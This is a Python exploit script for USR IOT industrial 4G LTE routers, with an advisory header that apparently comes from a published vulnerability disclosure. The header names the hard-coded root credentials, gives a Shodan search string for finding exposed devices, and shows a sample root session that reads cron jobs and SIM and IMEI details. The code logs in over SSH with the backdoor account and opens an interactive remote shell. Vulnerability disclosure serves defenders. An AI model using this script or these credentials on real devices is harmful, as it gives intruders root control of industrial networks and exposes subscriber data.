#!/usr/bin/env python3 # # # USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor # # # Vendor: Jinan USR IOT Technology Limited # Product web page: https://www.pusr.com | https://www.usriot.com # Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808) # 1.2.7 (USR-LG220-L) # # Summary: USR-G806 is a industrial 4G wireless LTE router which provides # a solution for users to connect own device to 4G network via WiFi interface # or Ethernet interface. USR-G806 adopts high performance embedded CPU which # can support 580MHz working frequency and can be widely used in Smart Grid, # Smart Home, public bus and Vending machine for data transmission at high # speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG, # flow control and has many advantages including high reliability, simple # operation, reasonable price. USR-G806 supports WAN interface, LAN interface, # WLAN interface, 4G interface. USR-G806 provides various networking mode # to help user establish own network. # # Desc: The USR IOT industrial router is vulnerable to hard-coded credentials # within its Linux distribution image. These sets of credentials are never # exposed to the end-user and cannot be changed through any normal operation # of the device. The 'usr' account with password 'www.usr.cn' has the highest # privileges on the device. The password is also the default WLAN password. # Shodan Dork: title:"usr-*" // 4,648 ed ao 15042022 # # ------------------------------------------------------------------------- # lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14 # # --Got rewt! # # id;id root;pwd # uid=0(usr) gid=0(usr) # uid=2(root) gid=2(root) groups=2(root) # /root # # crontab -l # */2 * * * * /etc/ltedial # */20 * * * * /etc/init.d/Net_4G_Check.sh # */15 * * * * /etc/test_log.sh # */120 * * * * /etc/pddns/pddns_start.sh start & # 44 4 * * * /etc/init.d/sysreboot.sh & # */5 * * * * ps | grep "/usr/sbin/ntpd" && /etc/init.d/sysntpd stop; # 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop; # cat /tmp/usrlte_info # Local time is Fri Apr 15 05:38:56 2022 # (loop) # IMEI Number:8*************1 # Operator information:********Telecom # signal intensity:normal(20) # # Software version number:E*****************G # SIM Card CIMI number:4*************7 # SIM Card number:8******************6 # Short message service center number:"+8**********1" # system information:4G Mode # PDP protocol:"IPV4V6" # CREG:register # Check ME password:READY # base station information:"4**D","7*****B" # cat /tmp/usrlte_info_imsi # 4*************7 # # exit # # lqwrm@metalgear:~$ # ------------------------------------------------------------------------- # # Tested on: GNU/Linux 3.10.14 (mips) # OpenWrt/Linaro GCC 4.8-2014.04 # Ralink SoC MT7628 PCIe RC mode # BusyBox v1.22.1 # uhttpd # Lua # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5705 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php # # # 10.04.2022 # import paramiko as bah import sys as baaaaaah bnr=''' ▄• ▄▌.▄▄ · ▄▄▄ ▪ ▄▄▄▄▄ █▪██▌▐█ ▀. ▀▄ █·██ ▪ •██ █▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄ ▐█.▪ ▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌· ▄▄▄▄· ▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀ ▄▄▄ ▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪ ▪ ▀▄ █· ▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄ ▄█▀▄ ▐▀▀▄ ██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌ ·▀▀▀▀ ▀ ▀ ▄▄▄▀ ·▀ ▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀ ▀ ▀▄ █·▪ ▪ •██ ▐▀▀▄ ▄█▀▄ ▄█▀▄ ▐█.▪ ▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌· ▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ · ▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀. ▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄ ▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█ ▀ ▀ ·▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀▀ ''' print(bnr) if len(baaaaaah.argv)<2: print('--Gief me an IP.') exit(0) adrs=baaaaaah.argv[1] unme='usr' pwrd='www.usr.cn' rsh=bah.SSHClient() rsh.set_missing_host_key_policy(bah.AutoAddPolicy()) try: rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook. print('--Got rewt!') except: print('--Backdoor removed.') exit(-1) while True: cmnd=input('# ') if cmnd=='exit': rsh.exec_command('exit') break stdin,stdout,stderr = rsh.exec_command(cmnd) print(stdout.read().decode().strip()) rsh.close()